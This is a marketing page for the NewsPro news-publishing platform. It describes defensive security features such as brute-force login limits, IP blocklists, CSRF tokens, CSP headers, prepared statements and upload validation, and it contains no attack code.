Enterprise-Grade Security
Every layer of your site is protected — from login to content delivery to your readers' data.
NewsPro implements security best practices at every layer of the stack. Login protection, IP-level controls, CSRF tokens, Content Security Policy headers, SQL injection prevention, secure sessions, and more — all active by default. You publish news. We handle the security.
- Brute-force login protection with configurable rate limiting
- IP allowlist and blocklist — permanently block bad actors
- CSRF token protection on every form and action
- Content Security Policy (CSP) headers on all pages
- SQL injection prevention via PDO prepared statements
- Secure session management with encrypted tokens
- HTTPS enforced — free SSL on every site
- Comment rate limiting — prevents spam floods
- CSP violation reporting — get notified of injection attempts
- PHP error display disabled in production — no information leakage
Login & Access Security
Brute-Force Protection
After a configurable number of failed login attempts, the IP is automatically blocked for a configurable time window (60 seconds up to 24 hours). Protects against password guessing attacks.
IP Allowlist
Whitelist trusted IPs that bypass rate limiting entirely. Useful for your office network or team VPN — so legitimate editors are never locked out.
IP Blocklist
Permanently block specific IP addresses or ranges. Any request from a blocked IP is rejected immediately — before it ever reaches your application.
Role-Based Access
Four permission levels: Admin, Editor, Writer, Contributor. Each role sees only what they're allowed to see and do. Writers can't access billing; Contributors can't publish without review.
Secure Sessions
Sessions use cryptographically secure tokens with strict cookie settings (HttpOnly, SameSite, Secure). Session hijacking and cross-site request attacks are actively blocked.
CSRF Protection
Every form submission — login, article save, settings change, user action — includes a validated CSRF token. Forged requests from external sites are rejected.
Infrastructure Security
Content Security Policy
CSP headers restrict which scripts, styles, and resources can load on your pages. Even if an attacker injects code, the browser blocks it from executing. CSP violations are logged for review.
SQL Injection Prevention
Every database query uses PDO prepared statements with parameter binding. Raw SQL injection is architecturally impossible — the database never interprets user input as code.
HTTPS Everywhere
All sites run on HTTPS. Free SSL certificates are provisioned automatically. HTTP traffic is redirected to HTTPS. Data in transit is always encrypted.
No Error Leakage
PHP error display is disabled in production. Errors are logged internally but never shown to visitors. Attackers can't probe your system by triggering error messages.
Common Questions
Yes. Reader data is stored in your isolated tenant database. All connections are encrypted. We never sell or share reader data with third parties.
Yes. In Security Settings, add any IP (or comma-separated list of IPs) to the blocklist. Requests from blocked IPs are rejected immediately.
After the configured number of failed attempts (you set the threshold), the IP is automatically blocked for the configured window. You can also whitelist your own IP so you're never accidentally locked out.
Yes. Uploaded files are validated for MIME type, renamed to random strings, and stored outside the web root. PHP execution in the uploads directory is blocked at the server level.
Yes. The platform is regularly reviewed for OWASP Top 10 vulnerabilities. Security patches are deployed automatically to all sites.
Ready to Get Started?
Create your news site in 60 seconds. All features included in every plan.
Create Your Site